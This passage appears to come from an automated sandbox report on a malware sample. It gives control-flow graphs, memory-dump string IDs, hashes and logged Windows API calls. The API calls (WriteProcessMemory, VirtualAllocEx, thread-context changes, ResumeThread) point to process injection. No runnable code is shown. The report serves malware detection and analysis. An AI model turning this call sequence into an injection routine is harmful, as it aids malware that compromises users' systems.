90->94 95 1538d9e-1538da4 90->95 96 1538d12-1538d16 91->96 97 1538d18-1538d1b 91->97 110 1538d87-1538d92 94->110 111 1538d94 94->111 99 1538da6-1538daa 95->99 100 1538ddf-1538de5 95->100 96->97 98 1538d21-1538d25 96->98 97->22 97->98 98->22 105 1538d2b-1538d31 98->105 99->100 106 1538dac-1538db5 99->106 102 1538df1-1538df7 100->102 103 1538de7-1538deb 100->103 108 1538e03-1538e05 102->108 109 1538df9-1538dfd 102->109 103->71 103->102 105->68 105->73 112 1538db7-1538dbc 106->112 113 1538dc4-1538dda 106->113 114 1538e72-1538e7c call 1537780 107->114 115 1538eac-1538eb0 107->115 116 1538e07-1538e10 108->116 117 1538e3a-1538e3c 108->117 109->42 109->108 118 1538d96-1538d98 110->118 111->118 112->113 113->42 114->115 128 1538e7e-1538e93 114->128 115->71 121 1538eb6-1538eba 115->121 124 1538e12-1538e17 116->124 125 1538e1f-1538e35 116->125 117->42 119 1538e42-1538e49 117->119 118->42 118->95 121->71 126 1538ec0-1538ecd 121->126 124->125 125->42 131 1538ecf-1538eda 126->131 132 1538edc 126->132 128->115 137 1538e95-1538eaa 128->137 134 1538ede-1538ee0 131->134 132->134 134->42 134->71 137->2 137->115 140->80 141->80
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                • API String ID: 0-1435242062
                                • Opcode ID: a51e76f20b6e4a122a3d8259629e52a6ac19043a44cc2d98f8c22b59fcb1ac81
                                • Instruction ID: 810ff94a7b62625a1a0f8b45d6ed6aa51037e4d6032bc9f822a5d22b823570c9
                                • Opcode Fuzzy Hash: a51e76f20b6e4a122a3d8259629e52a6ac19043a44cc2d98f8c22b59fcb1ac81
                                • Instruction Fuzzy Hash: 4C125870A006099FCB29CF69D984A9EBBF6FF88314F148A69F5199B361D730ED41CB50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 373 1535d28-1535d2f 374 1535d37-1535d7b 373->374 429 1535d31 call 1535d19 373->429 430 1535d31 call 1535d28 373->430 431 1535d31 call 1535f68 373->431 379 1535d81-1535d89 374->379 380 1535e6e-1535ea4 374->380 379->380 381 1535d8f-1535da1 379->381 384 1535f58 380->384 427 1535da3 call 1536363 381->427 428 1535da3 call 1536380 381->428 383 1535da9-1535db0 383->380 386 1535db6-1535dba 383->386 387 1535eb9-1535ec3 384->387 388 1535eae-1535eb1 384->388 389 1535e00-1535e04 386->389 390 1535dbc-1535dc0 386->390 393 1535f5d-1535f66 387->393 395 1535ec9-1535ecb 387->395 392 1535eb7-1535f4a 388->392 388->393 389->380 391 1535e06-1535e0a 389->391 390->380 394 1535dc6-1535de8 390->394 396 1535e5b-1535e6d 391->396 397 1535e0c-1535e10 391->397 426 1535f51-1535f53 392->426 394->389 408 1535dea-1535df0 394->408 395->384 397->380 399 1535e12-1535e36 397->399 414 1535e38-1535e3e 399->414 415 1535e4e-1535e50 399->415 410 1535df2 408->410 411 1535df4-1535df6 408->411 410->389 411->389 416 1535e42-1535e4c 414->416 417 1535e40 414->417 415->396 416->415 417->415 426->384 427->383 428->383 429->374 430->374 431->374
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8aq$tP]q$tP]q$tP]q$$]q$$]q$$]q
                                • API String ID: 0-824007586
                                • Opcode ID: fea09bf5c161d0301c477d14289fc6e1e9992f9573023d881bfe82b228f8b66b
                                • Instruction ID: 633911d33e9a1a1433cd2803cdaf044d6584c58dbe5b8ab24f73c755e7237f01
                                • Opcode Fuzzy Hash: fea09bf5c161d0301c477d14289fc6e1e9992f9573023d881bfe82b228f8b66b
                                • Instruction Fuzzy Hash: 4751B430B102058FD7259B7AC84476EBBE6BFC8700F14D86AD11ACF2A5EA35D845C791

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 432 153b828-153b85d call 153b0dc 436 153b861-153b86d 432->436 437 153b85f 432->437 438 153b86f-153b88b call 153b05c 436->438 437->438 443 153b88f-153b89b 438->443 444 153b88d 438->444 445 153b89d-153b8e4 443->445 444->445 451 153b8e6-153b8fd call 153ba38 445->451 452 153b935 445->452 454 153b903-153b907 451->454 453 153b93a-153b93e 452->453 455 153b940-153b94d 453->455 456 153b955 453->456 454->452 457 153b909-153b90d 454->457 455->456 458 153b956 456->458 459 153b920-153b933 457->459 460 153b90f-153b913 457->460 458->458 459->453 460->452 462 153b915-153b91d 460->462 462->459
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: PH]q$Te]q$Te]q$Te]q$Te]q$Te]q$Te]q
                                • API String ID: 0-2943635446
                                • Opcode ID: bc9e8c26f60335dd99d1a88a46bdcc9e29e8f605d0e265d55ca7b7ec11c59344
                                • Instruction ID: 4ed792515aae28169470fc571906a43116bbca28fe375dd25070c44b0f71cc42
                                • Opcode Fuzzy Hash: bc9e8c26f60335dd99d1a88a46bdcc9e29e8f605d0e265d55ca7b7ec11c59344
                                • Instruction Fuzzy Hash: 27319431E002098FDB289FADC4587AEBBF6BBC8B10F548919D456AB394CF744C85CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1240 153b818-153b85d call 153b0dc 1244 153b861-153b86d 1240->1244 1245 153b85f 1240->1245 1246 153b86f-153b88b call 153b05c 1244->1246 1245->1246 1251 153b88f-153b89b 1246->1251 1252 153b88d 1246->1252 1253 153b89d-153b8e4 1251->1253 1252->1253 1259 153b8e6-153b8fd call 153ba38 1253->1259 1260 153b935 1253->1260 1262 153b903-153b907 1259->1262 1261 153b93a-153b93e 1260->1261 1263 153b940-153b94d 1261->1263 1264 153b955 1261->1264 1262->1260 1265 153b909-153b90d 1262->1265 1263->1264 1266 153b956 1264->1266 1267 153b920-153b933 1265->1267 1268 153b90f-153b913 1265->1268 1266->1266 1267->1261 1268->1260 1270 153b915-153b91d 1268->1270 1270->1267
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: PH]q$Te]q$Te]q$Te]q$Te]q
                                • API String ID: 0-3341053991
                                • Opcode ID: 713ffc4bd1e3f46d785f92f81bc90c0bf1ec827d00e29e7d6b75d1ff45beb4da
                                • Instruction ID: ee2015b1f00d7af3ef48e04a41f71bc12f0ae02f8f14aa7b652ace12a4ac7258
                                • Opcode Fuzzy Hash: 713ffc4bd1e3f46d785f92f81bc90c0bf1ec827d00e29e7d6b75d1ff45beb4da
                                • Instruction Fuzzy Hash: 84317031E00209DFDB289FA9C4547AEBBF2BBC8710F14892ED456AB694CB754C85CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 5521 1535d19-1535d2f 5577 1535d31 call 1535d19 5521->5577 5578 1535d31 call 1535d28 5521->5578 5579 1535d31 call 1535f68 5521->5579 5522 1535d37-1535d7b 5527 1535d81-1535d89 5522->5527 5528 1535e6e-1535ea4 5522->5528 5527->5528 5529 1535d8f-1535da1 5527->5529 5532 1535f58 5528->5532 5575 1535da3 call 1536363 5529->5575 5576 1535da3 call 1536380 5529->5576 5531 1535da9-1535db0 5531->5528 5534 1535db6-1535dba 5531->5534 5535 1535eb9-1535ec3 5532->5535 5536 1535eae-1535eb1 5532->5536 5537 1535e00-1535e04 5534->5537 5538 1535dbc-1535dc0 5534->5538 5541 1535f5d-1535f66 5535->5541 5543 1535ec9-1535ecb 5535->5543 5540 1535eb7-1535f4a 5536->5540 5536->5541 5537->5528 5539 1535e06-1535e0a 5537->5539 5538->5528 5542 1535dc6-1535de8 5538->5542 5544 1535e5b-1535e6d 5539->5544 5545 1535e0c-1535e10 5539->5545 5574 1535f51-1535f53 5540->5574 5542->5537 5556 1535dea-1535df0 5542->5556 5543->5532 5545->5528 5547 1535e12-1535e36 5545->5547 5562 1535e38-1535e3e 5547->5562 5563 1535e4e-1535e50 5547->5563 5558 1535df2 5556->5558 5559 1535df4-1535df6 5556->5559 5558->5537 5559->5537 5564 1535e42-1535e4c 5562->5564 5565 1535e40 5562->5565 5563->5544 5564->5563 5565->5563 5574->5532 5575->5531 5576->5531 5577->5522 5578->5522 5579->5522
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: tP]q$tP]q$$]q$$]q
                                • API String ID: 0-1338969139
                                • Opcode ID: 8af6028d5ee443eaad3d73c9810cf019383c3e8d8b410b20f9f578951f6d88ef
                                • Instruction ID: 6a3e8168f326ba96d3a189af3fda2d410fd12585b4fe184eeb39624947a1aeb5
                                • Opcode Fuzzy Hash: 8af6028d5ee443eaad3d73c9810cf019383c3e8d8b410b20f9f578951f6d88ef
                                • Instruction Fuzzy Hash: 0531C6307103058FE7398A69C84472E7BE6BFC4700F18D9AAD4564F2A5EB759C44C7A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: (o]q$$]q$$]q
                                • API String ID: 0-989248301
                                • Opcode ID: d5e7cc414be17845a99812a32cca61a2639137ed8e62319a54b25f010f361ea6
                                • Instruction ID: 5d30630c16a9d5e032d4be9b56cb16f5b4d54ad9f2e5b785adcc5e36661e1834
                                • Opcode Fuzzy Hash: d5e7cc414be17845a99812a32cca61a2639137ed8e62319a54b25f010f361ea6
                                • Instruction Fuzzy Hash: 3C726F74A0021D8FDB25DBA5C950BAEBBB6FF84300F1080A9C54AAB3A5DF349D45DF91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: 7$Haq$Haq
                                • API String ID: 0-3030771670
                                • Opcode ID: eaf54df97075bf325fd6d312c3df4d7ea505a237947645e76fabb5a6a0db8c06
                                • Instruction ID: 359c36e9bc5088a7f054f40a79b73754f9d482e7c2c99f8c86b99f28cadb8b18
                                • Opcode Fuzzy Hash: eaf54df97075bf325fd6d312c3df4d7ea505a237947645e76fabb5a6a0db8c06
                                • Instruction Fuzzy Hash: 91E1BE70B002159FDB15AF69C894B7E7BA6BBC8341F148829E906CB3A5CF74DD42CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: (aq$(aq$(aq
                                • API String ID: 0-2593664646
                                • Opcode ID: 0a6ea6a9c9da3609f312e0381f0c572838d9e997249cc4d3e65df201a8f49b4e
                                • Instruction ID: 3890bcf9a6f96682eb2ec3cac75637533387e5d5d767a97db942ef3beaf009e2
                                • Opcode Fuzzy Hash: 0a6ea6a9c9da3609f312e0381f0c572838d9e997249cc4d3e65df201a8f49b4e
                                • Instruction Fuzzy Hash: 75A1AFB0A003099FCB15DFA9C84879EFBF5FF89310F148559E805AB251DB759D81CBA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$TJbq$Te]q
                                • API String ID: 0-2800237591
                                • Opcode ID: 4a4802fed740d0d5f69edfa133177dff48bb25c3a7150c543d8305c540eca837
                                • Instruction ID: 9beedc537bd65b8241564307458dbbc432241a85b8e0bbfeb59cbb919059fba8
                                • Opcode Fuzzy Hash: 4a4802fed740d0d5f69edfa133177dff48bb25c3a7150c543d8305c540eca837
                                • Instruction Fuzzy Hash: DB41979160E7D14FD7035B38986465A7FB2AF97118B1E01DBC1C6CF6E3D9198C0A83AB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq$Haq
                                • API String ID: 0-4016896955
                                • Opcode ID: acf9a2fd723bbe59e0ae6bcec555fddd0c298b837a7e5ccedcfbc20ba09aaa24
                                • Instruction ID: 6331bcc7e26556669f84cede889a887a2fffa4df03e16409d1a840c9fb5ff9b1
                                • Opcode Fuzzy Hash: acf9a2fd723bbe59e0ae6bcec555fddd0c298b837a7e5ccedcfbc20ba09aaa24
                                • Instruction Fuzzy Hash: F3D1E1B0A142098BC704FBB9D89966EBFF6FFC9340F454869D449B7390DE384C4687A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q
                                • API String ID: 0-3120983240
                                • Opcode ID: 3c1c5223b1e68dbacaaa77e70cb15049cea6aea2d0f7374434b315e3d78a4119
                                • Instruction ID: 578cea022ef8346cbaf6d9607719dee0f7d2a0259c8f041ce4f6824086340955
                                • Opcode Fuzzy Hash: 3c1c5223b1e68dbacaaa77e70cb15049cea6aea2d0f7374434b315e3d78a4119
                                • Instruction Fuzzy Hash: E2B15D303041018FEB359A2DC89873E7BEABFC5A44F1445ABE612DF3A5DA29CC42E751
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,aq$,aq
                                • API String ID: 0-2990736959
                                • Opcode ID: 0a7e3fc60a9226af3136fb5e4cc9702e4d214439328b08749f15100478a63e6f
                                • Instruction ID: 0882f62cc6d04d335f0c442f2d6c83883a41d6c8ca2e9990905f6df16639e265
                                • Opcode Fuzzy Hash: 0a7e3fc60a9226af3136fb5e4cc9702e4d214439328b08749f15100478a63e6f
                                • Instruction Fuzzy Hash: 4F817AB5E00106CFDB14CFADC884AAEBBF6BFCD210B158569D506AB365D731E942CB50
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq$Haq
                                • API String ID: 0-4016896955
                                • Opcode ID: e25bc8a38050edd77f5b48d46e261698bd267be89b1d1e87af9aba3aa07aa742
                                • Instruction ID: 7e31b39cc58a72433337568f6144096c03db61a9a1fe70ed24b9e8e4e7b3f3b9
                                • Opcode Fuzzy Hash: e25bc8a38050edd77f5b48d46e261698bd267be89b1d1e87af9aba3aa07aa742
                                • Instruction Fuzzy Hash: 2641BE7160425A9FDB228F68C844BAE7BF2FFC9300F05899AE8068F395DB34C851C791
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q
                                • API String ID: 0-3120983240
                                • Opcode ID: d92e7a4e2a98afb001cf86c1b9dd0ba9689a3d9a4e18e18f71b8f5f414f06642
                                • Instruction ID: a4ec2805d25cdcecb3bf5cfcf729828fa58700c571aaa0ac6f3e59695b348f87
                                • Opcode Fuzzy Hash: d92e7a4e2a98afb001cf86c1b9dd0ba9689a3d9a4e18e18f71b8f5f414f06642
                                • Instruction Fuzzy Hash: 210186363000056FDB285A6D9C9497E6FDBAFCC361B144529B90AC7350DE758C0197A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: TJbq$Te]q
                                • API String ID: 0-3147309840
                                • Opcode ID: c652c98f560af88cd98e79f434cbf125dfd575b388a18cc7ce7b808f30f3a6bc
                                • Instruction ID: d2896ca39f62ca64b3fa9504236478e6d97ea0b2ded9f42fa7470a5ed2227244
                                • Opcode Fuzzy Hash: c652c98f560af88cd98e79f434cbf125dfd575b388a18cc7ce7b808f30f3a6bc
                                • Instruction Fuzzy Hash: 93F0F6753000164FCA08AB7DA45493E77DBAFC9A20315005DE50ACB3A4CD61DC034396
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: Te]q
                                • API String ID: 0-52440209
                                • Opcode ID: 955f21eb8c537449625b958df6cbdd9425b7826c2445cab6763e26328fbd1006
                                • Instruction ID: d5e9499cce2c877b219d3758023488e1c0a3ecd360fd1e70ce92ae1fcfe2bee3
                                • Opcode Fuzzy Hash: 955f21eb8c537449625b958df6cbdd9425b7826c2445cab6763e26328fbd1006
                                • Instruction Fuzzy Hash: 7A52AE70E143198BC754FB78E89976DBBB6AB88304F8485A9D44CF7350DE385C89CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: (o]q
                                • API String ID: 0-794736227
                                • Opcode ID: 2cb36daddba9a35b6eca8a9661b0ccf1fa77049b377f77844198c028859f3d01
                                • Instruction ID: c387a41c6a52a17a095f182a914b7ab9fce8d3d5fbbdc31c4b8a7389661baddd
                                • Opcode Fuzzy Hash: 2cb36daddba9a35b6eca8a9661b0ccf1fa77049b377f77844198c028859f3d01
                                • Instruction Fuzzy Hash: 061229B1601506DFCB15CF68C584AAEBBF6BF88308F158954E405DB3A5D7B0E981CFA1
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07E2E6D0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 840925d9b176c0402422c4603aa607c68b315be0ed82a4cbd3622f1471c7be54
                                • Instruction ID: b9126616c95c583e836d3a61d0137efdd8b9f635ae198c8f69924a812d5a9ba9
                                • Opcode Fuzzy Hash: 840925d9b176c0402422c4603aa607c68b315be0ed82a4cbd3622f1471c7be54
                                • Instruction Fuzzy Hash: A7214AB5D003199FCB10DFA9C885BEEBBF5FF48314F108429E919A7240C7789955DBA4
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07CBBEAB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 699916dad11f29b2e45e116a0e056ee859b79ae5719cac0f217926b16237905d
                                • Instruction ID: c69a7a209985011f8eb2eb46d9ff94e2eb45af2a39581a62f12740f9e7f76ee3
                                • Opcode Fuzzy Hash: 699916dad11f29b2e45e116a0e056ee859b79ae5719cac0f217926b16237905d
                                • Instruction Fuzzy Hash: 58213AB58043499FCB11CF9AC884ADEFFF4EF49310F10845AE558A7251C378A944CFA1
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07E2F0AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 9596519061c19f8962ff0504cc39d7409c87bdc6e8f35004ec3f8f0eeed79133
                                • Instruction ID: 8e2f6bf7518792a8686647cc55c6c8860d3ae8ec8640e97f51f1482830be00fb
                                • Opcode Fuzzy Hash: 9596519061c19f8962ff0504cc39d7409c87bdc6e8f35004ec3f8f0eeed79133
                                • Instruction Fuzzy Hash: E32138B1D002098FDB10DFAAC485BEEBBF4FF48314F10842AD559A7240CB78A985CFA1
                                APIs
                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 07E2D896
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 393292d7e49df06b062855d9b847971227c67d4c21520808d99a52705f461202
                                • Instruction ID: 5facfcc03c6884a125fd8d3878817d77d76537f149d64f8d52bc7986383701d7
                                • Opcode Fuzzy Hash: 393292d7e49df06b062855d9b847971227c67d4c21520808d99a52705f461202
                                • Instruction Fuzzy Hash: F52138B5D002098FDB14DFAAC4857EEBBF4EF48314F108429D559A7240CB78A985CFA1
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07E24ABB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: cd5cf903c5d5ba5cf45c5fa12c181f0f27f914f435f894cbede0f44b5de01d59
                                • Instruction ID: 6f0a9b08e2b1adffa20763dc8108a95771d8c6eacd71eb7c6e191a10b1b5e6b1
                                • Opcode Fuzzy Hash: cd5cf903c5d5ba5cf45c5fa12c181f0f27f914f435f894cbede0f44b5de01d59
                                • Instruction Fuzzy Hash: 04214AB59002499FCB10DF9AC885BDEFBF9FF49324F108429E458A3240D378A944CFA1
                                APIs
                                • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 07E2EE07
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 90deac7ba48644396fab22deaf83bf4afd848b538eadbf7b172f384b3108ce2d
                                • Instruction ID: 191e63c8aa2057addaf57f10c00e8a2c80dc5652dca78d25cb74f7af3a8631eb
                                • Opcode Fuzzy Hash: 90deac7ba48644396fab22deaf83bf4afd848b538eadbf7b172f384b3108ce2d
                                • Instruction Fuzzy Hash: 722135B1C002099FDB10DFAAC444AEEBBF5FF88320F10842AD519A7240CB79A941DFA1
                                APIs
                                • DeleteFileW.KERNELBASE(00000000), ref: 07C3C668
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727896490.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7c30000_umVoLahqZn.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 2ad81ddaf247f918e2480afef6027ed9aee2cfda60a0298edbc4f1454cd19846
                                • Instruction ID: 4bb8f1611caa912d7f0d8006068c14a8ff5ef3dc57080ebe63db5e8659becc8c
                                • Opcode Fuzzy Hash: 2ad81ddaf247f918e2480afef6027ed9aee2cfda60a0298edbc4f1454cd19846
                                • Instruction Fuzzy Hash: 671124B1C0061A9BCB10CF9AC544A9EFBB4EF48720F10812AD818B7240D778A944CFA5
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07E24ABB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: c8db7fd807dd3cb3e634247b7b8b867e3e3098903765aff31f593c2ac366b154
                                • Instruction ID: 6ffc979e8d1211a7cf7c4164dbfdb3bdd1bdbccc9aa22c2ded4afffacc5b7060
                                • Opcode Fuzzy Hash: c8db7fd807dd3cb3e634247b7b8b867e3e3098903765aff31f593c2ac366b154
                                • Instruction Fuzzy Hash: EF21E4B59002599FCB10DF9AC884BDEFBF4FF49320F108429E958A7650D378A944CFA5
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07CBBEAB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 59773ec872d37740fa72237038d01770823ec3c3689d8d6426c5ef5333b094a7
                                • Instruction ID: dfa695a88d707cdf232d4c93a1c94fa65941f57472ccc07763c09ffaddab4497
                                • Opcode Fuzzy Hash: 59773ec872d37740fa72237038d01770823ec3c3689d8d6426c5ef5333b094a7
                                • Instruction Fuzzy Hash: 7421E4B59002499FCB10DF9AC484BDEFBF8FF49320F108429E958A7250D378AA44CFA1
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07E2DF6E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: a3ae252fecd044e0f5cddbe74169f537137b18ea2d291d47b3c200c9fa180166
                                • Instruction ID: 875eb47a549b3540562c6648c5ec36a78f09e68c3acec56f1a1e4230088e6cae
                                • Opcode Fuzzy Hash: a3ae252fecd044e0f5cddbe74169f537137b18ea2d291d47b3c200c9fa180166
                                • Instruction Fuzzy Hash: FB113AB59002499FDB10DFAAC845ADEBFF5EF48314F108419E519A7250C779A550CFA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: ff18bae8b73ec6dc77f713f1ef501daba42172914cde05a94c8ee291926c50a8
                                • Instruction ID: 9975dfecdaaf81f23e975c798e5f6ece2ce06d0590876bfe03f0cb4653e6e40c
